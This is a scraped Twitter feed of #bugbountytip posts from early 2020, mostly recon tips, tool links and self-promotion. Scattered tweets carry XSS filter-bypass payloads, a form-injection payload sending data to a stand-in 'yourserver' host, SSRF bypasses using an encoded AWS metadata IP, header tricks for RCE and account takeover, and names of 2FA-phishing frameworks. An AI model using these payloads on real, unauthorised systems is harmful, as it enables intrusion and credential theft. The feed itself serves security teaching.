0 StrandHogg Bug - Unpatched Android OS Vulnerability https://t.co/HlOcn2eebr #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #CyberSecurityTraining #devsecops #cybersecurity #training #ceh #eccouncil #certification #hackerone
HackDoor
@hackd00r


2020-02-10 08:31:45
13 Easy Subdomain Enumeration Using Censys For Bug Bounty https://t.co/xdWLzfLtCf #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #CyberSecurityTraining #devsecops #cybersecurity #training #ceh #eccouncil #certification #hackerone
HackDoor
@hackd00r


2020-02-10 08:26:56
0 #bugbountyTip : Find Hidden HTTP headers and inject them, this is a simple way to reach HIGH RISK security bugs ! Follow #Hackdoor -💰💰💰💰 Facebook - https://t.co/lb0uyl3k4p #BugBounty #BugBountyTip #bugbountytips #pentesting #CyberSecurityTraining #devsecops #cybersecurity
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-10 08:26:39
2 #bugbountyTip : Find Hidden HTTP headers and inject them, this is a simple way to reach HIGH RISK security bugs ! Follow #Hackdoor -💰💰💰💰 Facebook - https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #bugbountytips #pentesting #CyberSecurityTraining #devsecops #cybersecurity
HackDoor
@hackd00r


2020-02-10 06:03:31
0 Machine Learning With Python https://t.co/xgVzOtztBU Follow #Hackdoor - Facebook - https://t.co/lb0uyl3k4p #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil #certification #training #cybersecuritytraining
IAM Platform
@IAM__Network


2020-02-09 21:43:54
0 IAM Platform Curated Retweet: Via: https://t.co/FPuuLiaFEk #bugbountytip If the server only allows GET and POST method, then try adding X-HTTP-Method-Override: PUT to achieve RCE via PUT method Thanks to Zigoo0 #bugbounty #infosec #informations
Mohammed Israil 🇮🇳
@mdisrail2468


2020-02-09 19:44:57
2 :-: If your target site having the RSS Feed turn ON, go to https://t.co/KdPwakGJNm, and search for the `generator` tag and you may find the current WordPress version being used for potentially developing the further testings steps. #bugbounty #bugbountytip
AEMSecurity
@AEMSecurity


2020-02-09 19:27:57
1 [+] #BugbountyTip: CVE-2016-0956 - Apache Sling Core Framework Information Disclosure Vulnerability <-- You can still find many vulnerable AEM Instances (free to contact me if you need help understanding this one) #Bugbounty #TogetherWeHitHarder #BugBountyTip https://t.co/xmM8vLXCDT
Bogdan Bodishtyanu
@xalerafera


2020-02-09 19:21:16
0 If the attacked application blocks (" ") characters, then try using quotes instead of them) This will help you bypass the protection. <script>alert`1`</script> #bugbounty #bugbountytips #bugbountytip #hackerone https://t.co/2sAlUOjJOl
HackIsOn ®
@hackison


2020-02-09 17:14:13
4 OSINT tools usage #osint #hacking #hackison #owasp #cybersecurity #linux #bugbounty #bugbountytip #bugbountytips #pentesting #vapt #wapt #CloudComputing #dataprivacy #GDPR #databreach #hacker https://t.co/3iqmOOZe9w
Nikhil Mahajan
@mahajan344


2020-02-09 16:44:54
0 Want to do static analysis of Android apps not sure how to get APK file, use following mirror website to download current/historical version of the app to find API end-points, hardcoded token, keys. #AndroidHackingMonth on @Hacker0x01 #bugbountytip #AndroidSecurity https://t.co/ko9uimIktc
Nikhil Mahajan
@mahajan344


2020-02-09 15:37:25
1 Found a firebase API key in the Android app, not sure what to do? use Pyrebase, A simple python wrapper for the Firebase API to test Authentication, DB and storage permissions. https://t.co/02ynuPy1tO #AndroidHackingMonth on @Hacker0x01 #bugbountytip
mohsin khan
@mohsink83789226


2020-02-09 12:27:10
0 HELP ?callback=something return something({"status": "failure", "code": 1, "data": "Missing required field 'scope'", "message": "Invalid parameters."}) how to exploit. #JSONP #CSP #bugbounty #bugbountytips #bugbountytip
Your Next Bug Tip
@YourNextBug


2020-02-09 07:44:00
0 get Bounty or get Experience 10 Facts about #BugBounty @akita_zen @ArbazKiraak https://t.co/Iderxl5Iai #bugbountytips #bugbountytip
IAM Platform
@IAM__Network


2020-02-09 07:35:30
1 IAM Platform Curated Retweet: Via: https://t.co/FPuuLisgvS #bugbountytip If the server only allows GET and POST method, then try adding X-HTTP-Method-Override: PUT to achieve RCE via PUT method Thanks to Zigoo0 #bugbounty #infosec #informations
HackIsOn ®
@hackison


2020-02-09 03:59:48
1 #owasp mobile top 10 where to look them #hacking #hackison #bugbountytip #bugbounty #bugbountytips #cybersecurity #vapt #wapt #mapt #pentesting #redteam https://t.co/BlhtVxHN5i
AEMSecurity
@AEMSecurity


2020-02-08 17:50:32
3 [+] #BugbountyTip: If you come across /api.json in any AEM instance during bug hunting, try for web cache poisoning via following headers: Host: , X-Forwarded-Server , X-Forwarded-Host and or simply try https://localhost/api.json HTTP/1.1 #Bugbounty #TogetherWeHitHarder
IAM Platform
@IAM__Network


2020-02-08 16:44:29
0 IAM Platform Curated Retweet: Via: https://t.co/FPuuLiaFEk #bugbountytip If the server only allows GET and POST method, then try adding X-HTTP-Method-Override: PUT to achieve RCE via PUT method Thanks to Zigoo0 #bugbounty #infosec #informations
Ammar Amer🇸🇾
@cry__pto


2020-02-08 14:26:12
3 different 2FA bypasses: evilginx:https://t.co/9haUXdvpV1 CredSniper:https://t.co/mFTPZYg8xY ReelPhish:https://t.co/FXtzjwgCYG Modlishka:https://t.co/mHNvbvYzF7 #pentest #hacking #phishing #redteam #bugbountytip
thehackerlab.io - jdksec.com
@jdksec


2020-02-08 13:58:16
0 Love it when a good script works first time 😂 #bugbountytip #bugbounty #hackerone #bugcrowd https://t.co/X6WRgIpWNZ
Your Next Bug Tip
@YourNextBug


2020-02-08 12:23:18
0 Read the comments for tips #bugbountytips #bugbountytip https://t.co/2ASOZQuLtA
STÖK
@stokfredrik


2020-02-08 10:04:58
5 @Zombiehelp54 wrote this great writeup on Exploiting Out Of Band XXE using internal network and php wrappers. Check it out! loved it! https://t.co/eTCHK7RvHM #bugbounty #bugbountytip #infosec #pentest #hacking
Your Next Bug Tip
@YourNextBug


2020-02-08 05:57:26
0 How many vulnerabilities you to check to find a valid one? #bugbountytips #bugbountytip #bugbounty
𝚛 𝚎 𝚣 𝟶
@rez0__


2020-02-08 04:43:49
0 Since I'm nearing 1k followers... [Easily automate bug bounty alerting] I just posted a blog post all about it. Shout outs to @TomNomNom and findomain in it! https://t.co/wgmOENFxm1 #bugbountytips #bugbountytip ;) #rootgoat2020 @InsiderPhD @Edu4rdSHL #bugbounty https://t.co/zwSyop4naW
IAM Platform
@IAM__Network


2020-02-08 02:18:04
0 IAM Platform Curated Retweet: Via: https://t.co/FPuuLiaFEk #bugbountytip If the server only allows GET and POST method, then try adding X-HTTP-Method-Override: PUT to achieve RCE via PUT method Thanks to Zigoo0 #bugbounty #infosec #informations
ghostlulz
@ghostlulz1337


2020-02-07 22:02:20
5 XSS payload blocked by your targets content security policy (CSP)? You know you can bypass the CSP with some simple techniques? Easy wins! More info on my blog: https://t.co/LqWudgPJ50 #BugBounty #bugbountytips #bugbountytip #infosec #csp #dfir #redteam #pentest #xss #appsec https://t.co/sG0TzZMhmB
offensive
@offensi74555475


2020-02-07 03:01:51
0 If you have checklist you improve what? You have back up so you can pick it easily Save your time of recalling your engagment,it's impossible if you relied on recalling info from your memory. tell me about your checklist let's share the knowledge!! #bugbountytip #infosec
offensive
@offensi74555475


2020-02-07 02:48:34
0 Having a checklist is a great way to provide some consistency to your testing.. do you have checklist? #bugbountytip #infosec #bughunt
thehackerlab.io - jdk
@the_hacker_lab


2020-02-06 22:29:45
2 Oneliner to get all status codes, size,url and redirect url with a ',' as a delimiter: cat webservers.txt | parallel -j50 -q curl -w 'Status:%{http_code},Size:%{size_download},%{url_effective},%{redirect_url}\n' -o /dev/null -sk #bugbountytip #bugbounty #hackerone #bugcrowd https://t.co/FQYcm6U9Is
thehackerlab.io - jdk
@the_hacker_lab


2020-02-06 22:24:18
0 Oneliner to get all Http Titles (if they exist) for i in $(cat Webservers.txt ); do echo "$i | $(curl --connect-timeout 0.5 $i -so - | grep -iPo '(?<=<title>)(.*)(?=</title>)')"; done | tee -a titles.txt #bugbountytip #bugbounty #hackerone #bugcrowd https://t.co/X4O63pHYhz
Nick || hunt4p1zza
@ngkogkos


2020-02-06 19:45:59
3 When an org is heavily using SSO: 1. Create a browser instance and login w/ all self-registered accounts. 2. Browse to all assets you are aware of ("Open Multiple URLs" plugin). You never know where you may end up logged in due to SSO misconfiguration. #bugbounty #bugbountytip
Bug Bounty Village
@bugbountyvillag


2020-02-06 18:59:24
0 #bugbountytip If the server only allows GET and POST method, then try adding X-HTTP-Method-Override: PUT to achieve RCE via PUT method Thanks to @Zigoo0 #bugbounty #infosec #informationsecurity https://t.co/h1spj3muxs
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-06 16:41:13
0 Hackdoor Corporate Training #GetCertifiedWithHackdoor Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/OOUY72a4aE
Ammar Amer🇸🇾
@cry__pto


2020-02-06 14:56:00
2 Find web directories without bruteforce: https://t.co/YaIRwKnrau Abusing Certificate Transparency logs for getting HTTPS websites subdomains.: https://t.co/7mq5XiIeuv the most complete OSINT collection and reconnaissance tool: https://t.co/0uNdRKFInX #bugbountytip #Hacking
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-06 12:33:43
0 When Hackdoor Does #CoporateTrainings in Style 🤖🤖 #Swag and #Sticker Distribution Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #pentesting #devsecops #cybersecurity https://t.co/k1CDcrafMP
Keshav Malik
@g0t_rOoT_


2020-02-06 10:43:15
3 Hey Hunters 😄 Here's my First Write-up on Medium regarding an Unexpected Bounty . Do give it a read. Suggestions are welcomed ! 💯 #bugbounty #bugbountytip #bugcrowd #hackerone #responsibledisclosure https://t.co/ZF0IXHsDL6
Grzegorz Niedziela
@gregxsunday


2020-02-06 06:39:45
0 @PaulosYibelo @Random_Robbie @MrTuxracer shodan download --limit=100000 outfile query shodan parse --fields=ip_str,port,https://t.co/qnzC7dYu8m,org,domains,hostnames --separator=";" outfile.json.gz > outfile.json 2/2 #bugbountytip
Grzegorz Niedziela
@gregxsunday


2020-02-06 06:38:48
0 @PaulosYibelo @Random_Robbie @MrTuxracer On https, use ssl certificate information. It will show you the organization the cert was issued to. From my experience, this is the most reliable way of identifying IP. Moreover, use shodan fields like org, domains, hostnames. 1/2 #bugbountytip
Sunil Kumar Singh
@0xsunil


2020-02-06 06:18:48
0 @sshell_ Please use hashtags like #bugbounty #bugbountytip #bugbountytips to reach out more people. It becomes easier for people to know. Thanks for the tip anyway.
INTIGRITI
@intigriti


2020-02-05 19:53:52
1 How to Pwn A Pwned Citrix? Is it possible to upgrade your recon with the @discordapp and tweeted @jobertabma the best #bugbountytip of the week? All of these answers are available in the latest edition of our #BugBytes! #bugbounty 👇👇👇 https://t.co/0Qcq2tBBQo
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-02-05 18:53:20
0 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/Jd9xcmmcvp
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍 台風
@spyerror


2020-02-05 17:43:11
1 ➺ Load trial continues, a marvelous load everything is forgotten. Stay with me, checkmate.. ✮ #BugBounty #BugBountyTip #WAF #infosec https://t.co/nsPRzexTE3
◾
@saurinn_


2020-02-05 13:12:21
0 Excellent methodology and so well explained #bugbountytip #fuzzing https://t.co/Jt66YL8HQV
Yadhavi
@PrincessYadhavi


2020-02-04 21:16:50
0 I have put ssh key in settings. but when SSHed to gitlab after login welcome message, session closed immediately. Why happening this? How to solve this? #bugbountytips #bugbounty #bugbountytip
Yadhavi
@PrincessYadhavi


2020-02-04 20:40:50
2 Found a gitlab instance with register enabled. after logged in it looks really empty. how to escalate the severity? How to get code execution? And how to find gitlab version? #bugbountytips #bugbounty #bugbountytip
BlackClover
@Bc10ver


2020-02-04 12:10:55
0 Top story: @TakSec: 'XSS filter bypass using stripped </p> tag to obfuscate. P2 Stored XSS $1500 on a private bug bounty program. XSS Payload: <</p>iframe src=javascript:alert()// #xss #bugbountytip #bugbountytips #b… https://t.co/08qZGtvhUZ, see more https://t.co/fVnXn9Z0FJ
dawgyg
@thedawgyg


2020-02-04 04:18:15
33 When testing for SSRF using a black list, take internal IP addresses and when encoding them, don't encode entire IP. Encode 1 octet of the IP address, or 2 or 3. For Instance: AWS Metadata - 0251.254.169.254 (this got the $160,000 payout in Oct 2018) #bugbountytip #bugbounty
m0z
@LooseSecurity


2020-02-03 22:42:37
1 Repost of a #XSS payload I posted before without any parenthesis after "prompt"! Object.defineProperty(window, 'p', { get: prompt });p; By using a Getter, we invoke the prompt without any input! Ideal for bypassing WAF! #BugBounty #bugbountytips #bugbountytip #bugbounties
dawgyg
@thedawgyg


2020-02-03 21:51:04
13 When testing for SSRF, change the HTTP version from 1.1 to HTTP/0.9 and remove the host header completely. This has worked to bypass several SSRF fixes in the past. #bugbountytip #bugbountytip #bugbounty
Mike Takahashi
@TakSec


2020-02-03 20:01:52
10 XSS filter bypass using stripped </p> tag to obfuscate. P2 Stored XSS $1500 on a private bug bounty program. XSS Payload: <</p>iframe src=javascript:alert()// #xss #bugbountytip #bugbountytips #bugbounty #hacking @brutelogic https://t.co/ltjUpiL4Cu
Nick || hunt4p1zza
@ngkogkos


2020-02-03 18:22:10
0 Do you have a big file w/ URLs w/ many of them being default pages, wildcards etc? Use @TomNomNom's get-title hack to grep out common titles: cat urls.txt | get-title -c 300 > titles.txt cat titles.txt | grep -v "PATTERN" | awk -F '[()]' '{print $2}' #bugbountytip #bugbounty
kassih mouhssine
@KassihMouhssine


2020-02-03 17:18:36
0 hey anyone here targeted AT&T, if AT&T make my report triaged that's mean my report accepted 100% or not ? #BugBounty #bugbountytips #bugbountytip
Inti De Ceukelaire
@securinti


2020-02-03 16:45:39
0 @seanmeals Next time add #BugBountyTip to your post to get maximum profit
dark_warlord14
@dark_warlord14


2020-02-03 13:01:41
2 #bugbountytip #bugbountytips Never underestimate the power of Google Dorking. Just found a defaced website for bugbounty program. https://t.co/M3kEwoNDtI
Rafin Rahman Chy
@rafinrahmanchy


2020-02-03 11:20:45
3 Bug Bounty Hunting Methodology(Personal Made) #BugBounty #bugbountytip #bugbountytips #websecurity #webhacking #netsec #appsec #Recon #pentest #pentester #Pentesting #Hacking #Hacker #EthicalHacking #EthicalHacker #whitehathacker #InfoSec #InfoSecurity #ITSecurity #CyberSecurity https://t.co/yNmFJJeivP
Hyker Security
@hykersecurity


2020-02-02 20:00:41
2 Cyber Security News Flash by @hykersec @HusseiN98D: 'WooT! There is always a way. New #bugbounty #pentest short write up! Chain the bugs till you get what you want. #bugbountytip #bugbountytips #hacking Some steps were … https://t.co/JHa7zDItBt, see more https://t.co/nF4yR9PGZj
setec:astronomy
@infowaropcenter


2020-02-02 18:42:04
0 Top story's from my Newspaper @HusseiN98D: 'WooT! There is always a way. New #bugbounty #pentest short write up! Chain the bugs till you get what you want. #bugbountytip #bugbountytips #hacking Some steps were not menti… https://t.co/N5BsQh0yO4, see more https://t.co/OzpGs17X9M
Your Next Bug Tip
@YourNextBug


2020-02-02 14:48:28
0 BLH - Broken Link Hijacking Just suppose Ur site uses cool.c/Script.js After few year cool.c decided to close it services. Now story begins 😈 buys cool.c and then host Script.js BOoOM This happened to Linkedin READ BELOW #bugbountytips #bugbountytip #bugbounty https://t.co/isLO5QMG0w
𝚛 𝚎 𝚣 𝟶
@rez0__


2020-02-02 13:02:27
0 Thanks for the awesome shoutout in your video @InsiderPhD! #bugbountytips #bugbountytip
Hussein Daher
@HusseiN98D


2020-02-02 12:48:15
15 WooT! There is always a way. New #bugbounty #pentest short write up! Chain the bugs till you get what you want. #bugbountytip #bugbountytips #hacking Some steps were not mentioned. RT, Like and Comments are appreciated. For any pentest work DM me:) 🎉🎉 https://t.co/nlAv4pMPhx
ｙｏｄｈｈａ
@y0dhha


2020-02-02 12:32:58
0 Reflected XSS https://t.co/TNZFocIB07 https://t.co/qxizmngi1Y https://t.co/qkg2tCZPJt https://t.co/tDIISt8s5o https://t.co/fywnUUvRJ8 https://t.co/rR1eG6xktM https://t.co/HBCDQ9WLS4 https://t.co/Kn5J7zoqKF https://t.co/zvsERH62Ok https://t.co/01CJDlehsT #bugbounty #bugbountytip
𝚛 𝚎 𝚣 𝟶
@rez0__


2020-02-02 12:31:36
0 Thanks for awesome shoutout in your video @InsiderPhD! #bugbountytips #bugbountytip https://t.co/MmkseVcmLQ
Sunil
@Sunilkande1137


2020-02-02 03:17:45
5 240+ good hacking resources at one place. https://t.co/Iab3Gg7Gyb #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #itsecurity #websecurity #appsec #security #Hackers #Android #Androidhacking #bugbountytips #bugbountytip
Your Next Bug Tip
@YourNextBug


2020-02-01 06:56:52
0 Haha, as expected no one is sharing, Ok then Share the worst external bug bounty program, at least it will save other's time. 😉 #bugbounty #bugbountytip #BugBountyTips https://t.co/UG7ktzJX40
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-02-01 05:00:34
0 Watch Out for Coronavirus Phishing Scams https://t.co/B4yqri19tw Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops
Ammar Amer🇸🇾
@cry__pto


2020-02-01 02:11:54
4 #OSINT : Better Whois:https://t.co/zqCvzqzJyy Active Whois:https://t.co/KtnxHQw6WZ ZabaSearch:https://t.co/5JhzsgJad3 TinEye:https://t.co/XCcelTU0ox isearch:https://t.co/03W18bTDhL serversniff:https://t.co/RTccIDZOJj robtex:https://t.co/xDzAcSX3iO #BugBountyTip #Hacking #pentest
Byron Smith
@MainframeGuyBS


2020-01-31 19:23:33
0 Look what I found on @LinkedIn 😎 Have fun my friends, BUG OUT. #CyberSecurity #Security #BugBountyTip #bugbountytips #Hackers #SecurityResearcher #TheCyberSecurityHub https://t.co/8oCpnkRIly
Joe Doran
@TheRealJoeDoran


2020-01-31 18:54:09
0 What mind mapping software do you use for large scope pentests? I think I’ve outgrown plain text files. #Pentesting #BugBountyTip
Your Next Bug Tip
@YourNextBug


2020-01-31 16:40:47
3 Any good external bug bounty program? #bugbounty #bugbountytips #bugbountytip
AK
@theanonymouscub


2020-01-31 15:43:10
0 Generally people don't tweet against Chinese and Russian ...... Reason :-. They fear their mobile phones and PCs could get hacked ! #caronavirus #cornavirus #PrayForChina #hackerone #Hackers #hackathon #bugcrowd #togetherwehitharder #bugbounty #BugBountyTip
Th3Alch3mist~
@Debian_Hunter


2020-01-31 14:01:24
0 OAuth+Host Header Injection leads to Account Takeover 🤙simple yet nice tip for beginners #bugbountytip #bughunting #infosec #bugbounty https://t.co/6qItnrR9Ky
Your Next Bug Tip
@YourNextBug


2020-01-31 13:41:59
1 Steps 0) Login in with Twitter 1) Host Header Injection [to a.cxx] 2) Generate OAuth Token's Link 3) Send link to Victim, after victim authorize 4) Verifier send to a.cxx 5) Reuse use token Account Takeover by @ngalongc #bugbountytips #bugbountytip https://t.co/fstnEFS244
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-31 13:07:47
0 Bug Hunter Life 🤖✅❤️ Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/zL6mBl7w1Z
youssef
@genieyou


2020-01-31 12:20:48
2 awesome idea for you blog @filedescriptor @ngalongc @EdOverflow great article congrats https://t.co/HdMi507hh4 #BugBounty #bugbountytips #BugBountyTip
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍 台風
@spyerror


2020-01-31 11:32:52
4 »_ everything is not as it seems. 🎃 «input»; p=-alert(1)}//\ $result* var n = {a: "-alert(1)}//\", b: "-alert(1)}//\"}; «input»; p=\&q=-alert(1)// $result* var n = {a: "\", b: "-alert(1)}//"}; #BugBounty #BugBountyTip #WAF #infosec
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-31 10:08:16
1 Bug Bounty Life Cycle 🤖🤖 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/WQOAxWKgfW
Yadhavi
@PrincessYadhavi


2020-01-31 10:08:03
0 Do you know any labs (free or paid ) to practice new CVEs online? Except @PentesterLab and pentesteracademy #bugbountytips #bugbounty #bugbountytip
Zerorose Inc.
@zeroroseinc


2020-01-31 06:53:03
0 Ethiopian governments shadowy #bugbounty initiative to reward for bugs and exploits in popular software. I believe first of it's kind for this kind of talent recruitment in Africa. Impressive! https://t.co/Hixyo8AoXS #bugbountytips #bugbountytip
m0z
@LooseSecurity


2020-01-31 00:24:24
4 Install Python. Open yourself up to a world of open-source bug bounty tools. Don't put it off, because it will enrich your skills. #BugBounty #bugbountytips #BugBountyTip #infosec #infosecurity
ｙｏｄｈｈａ
@y0dhha


2020-01-30 23:24:58
2 HTTP Request Smuggling -Socket Poisoning https://t.co/F8AECN2aaq #bugbountytips #BugBountyTip #bugbounty #http #infosec #cybersecurity https://t.co/f3cdoy3tIH
Donato Scaramuzzo
@ramirezVII


2020-01-30 19:30:50
0 Button disabled? Inspect Element -> change from "disabled" to "enabled" -> Button enabled and action performed #BugBountyTip 💪🏻😆
Rushiikesh 🇮🇳
@u1tran00b


2020-01-30 17:56:43
0 An Interesting Account Takeover: 😃 #infosec #bugbountytips #BugBountyTip #hackerone #bugcrowd Credits: @fatratfatrat ❤️💥🤘 https://t.co/fPCoT5hV5W
AEMSecurity
@AEMSecurity


2020-01-30 16:29:18
1 [+] #BugbountyTip: When testing for anonymous write access on Adobe AEM in "/content/usergenerated/*" If you get HTTP 404, try bypassing the dispatcher filter rules like this: "/ANYEXISTINGFOLDER/..../content/usergenerated/test" #Bugbounty #TogetherWeHitHarder #AdobeAEM
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-30 16:25:24
1 Cyber Security 🤪🤖🤖🤖🤖 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/Wsmd27pcML
fuzzsqlbOf
@fuzzsqlbof


2020-01-30 15:47:29
5 read my detailed writeup on HTTP Request Smuggling which i found in pvt program https://t.co/rUevK40Ip9 #bugbountytips #togetherwehitharder #bugbounty @albinowax #hackerone #bugbountytip
Your Next Bug Tip
@YourNextBug


2020-01-30 15:31:14
0 Thanks @traceableai for providing API testing resources(tips) There aren't many info about API testing but your tips and this blog post is awesome to learn API Testing #bugbountytips #bugbountytip #bugbounty https://t.co/6gI1kS7I7A
Zerorose Inc.
@zeroroseinc


2020-01-30 14:32:55
1 Accellion SSRF to LFD by exploiting a weak regex /$http://site.com/i -- without the ^ in the front so bypassing with file:///file#http://site.com by @PaulosYibelo https://t.co/I1iJ2ZnfqH #bugbountytips #bugbounty #bugbountytip
The Bug Bounty Podcast
@bounty_podcast


2020-01-30 13:17:17
3 Episode #2 - We sit down with @0xacb to talk about how to be successful in bug bounty, live events, music and creativity and of course, how to reach cosmic brain level 10. Listen on https://t.co/eY3KgecFBv #bountylife #bugbounty #bugbountypodcast #bugbountytip #bbp
INTIGRITI
@intigriti


2020-01-30 13:06:53
49 Some #bugbounty hunters made over €50.000 in bug bounties with this simple trick. 🤑 Thanks for the #BugBountyTip, @rez0__! https://t.co/z9sPFJTNqV
Black Turtle
@thebl4ckturtle


2020-01-30 10:30:20
0 A simple tool to detect wildcards domain based on Amass's wildcards detector. https://t.co/SrZP1KwNqh P/s: @jeff_foley Thanks for created an awesome tool! #bugbounty #golang #bugbountytip #bugbountytips
Andy Garcia
@GaelleTjat


2020-01-30 06:45:34
0 A Webshell story https://t.co/pOHt81i6dZ #bugbountytip @Hacker0x01 @Jhaddix #infosec
Robr
@sweepthatleg


2020-01-30 00:21:43
0 Always a fan of @LittleJoeTables creations. This time ⚡ fast screen shots in a convenient desktop app #bugbounty #bugbountytip #infosec #electron #javascript https://t.co/k9ae1Yk8Zq
z3rb0a
@OwlCyberGhost1


2020-01-30 00:14:41
0 My first race condition . They not view it as serious security risk. But rewarded me for appreciation #bugbounty #bugbountytip #hackerone #TogetherWeHitHarder https://t.co/UeArHgwfWr
Andri Wahyudi 🕊️
@andripwn


2020-01-29 20:30:25
1 Wordpress: Multiple Vulnerabilities in Simple Login Log Plugin https://t.co/gZdRnaJYdY #bugbountytip #bugbountytips #wordpress #vulnerability
Samet SAHIN
@sametsahinnet


2020-01-29 19:28:57
2 If you have a XSS in a <form> tag, close it and open a new form that you are controlling. Payload : "></form><form action="http://yourserver/> This is just a short payload for increasing the severity. #bugbountytip #bugbountytips https://t.co/140rJjo5Nt
Abhijeet Singh
@abhiunix


2020-01-29 16:15:03
0 My first bounty, after 25+ dups and 2 N/As. Got Hall of Fame in few programs but never get paid. Thanks to all members of bug bounty community. @Hacker0x01 A special Thanks to @OffensiveHunter Sir & @abhinavbom Sir for the guidance. #bugbounty #bugbountytip #TogetherWeHitHarder https://t.co/kKQQZ84Bba
Lütfü Mert Ceylan
@lutfumertceylan


2020-01-29 12:04:44
0 An exploit, 240+ affected site (Reflected XSS) @openbugbounty #BugBounty #bugbountytip https://t.co/Rp6SFcEOVY
Ujwal Kumar
@Ujwal07kumar


2020-01-29 08:01:22
1 https://t.co/mzK8B5B2zR Have written a blog on Bug bounty with Google recon. Contains list of dorks to check for juicy contents. Recommended to developers and security folks. #security #dataprivacy #bugbounty #bugbountytip Any suggestions are welcome. :)
Harsh Jaiswal
@rootxharsh


2020-01-29 02:45:10
1 One more: Find a subdomain such as <grafana>.corp.company.com which points to a external IP example however only accessible inside VPN and such SSRF could be leveraged in that way. You can often find such hosts over SSL. Have exploited such in pasts. Might even be a #bugbountytip https://t.co/lusB0fAEnU https://t.co/BVA99w6ios
Zerorose Inc.
@zeroroseinc


2020-01-28 22:15:59
2 Yahoo homepage strightfwd XSS by @PaulosYibelo from end of 2019. https://t.co/Il48kikn29 #bugbounty #bugbountytip
d4d
@d4d89704243


2020-01-28 20:36:48
0 I was able to successfully exploit the vulnerabilities in PHP parse_url from @orange_8361 article of 2017 https://t.co/jCdIuhFtz0 and found new way to exploit curl uri parser #bugbountytip
Ammar Amer🇸🇾
@cry__pto


2020-01-28 18:54:08
5 #OSINT DomainTools:https://t.co/zFCGR0Un8G Active Whois:https://t.co/KtnxHQevyp Domain Dossier:https://t.co/hjdz9aNJuW Network Solutions:https://t.co/rZhFIOmJVZ DNSstuff:https://t.co/C5T85kfbOB DNS-Digger:https://t.co/FWwXrCvNdm Shodan:https://t.co/U8xoj0R4dN #bugbountytip
Aish Kendle
@aish_kendle


2020-01-28 18:24:49
0 Got my first Subdomain Takeover! #ReconWins #bugbountytips #bugbounty #s3 #aws #azure #bounty #bug #bughunting #infosec #reward #bugbountytip #first #recon #cybersecurity #infosec #cyberattack #hacking https://t.co/07eVXqCIWS
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-28 10:24:17
1 Hackers Say Yo ! 🤖🤖 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/vheJORritR
Abhishek 🕵️
@abhishake100


2020-01-28 09:49:36
0 I just published "Hyperlink Injection - Easy Money (sometimes)" #bugbounty #bug #bounty #bugbountytip https://t.co/zLbLOZraqX
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-28 09:23:49
2 Online Privacy is a MYTH ! 🤖🤖🤖 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/pFsxZWkByp
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-28 09:20:31
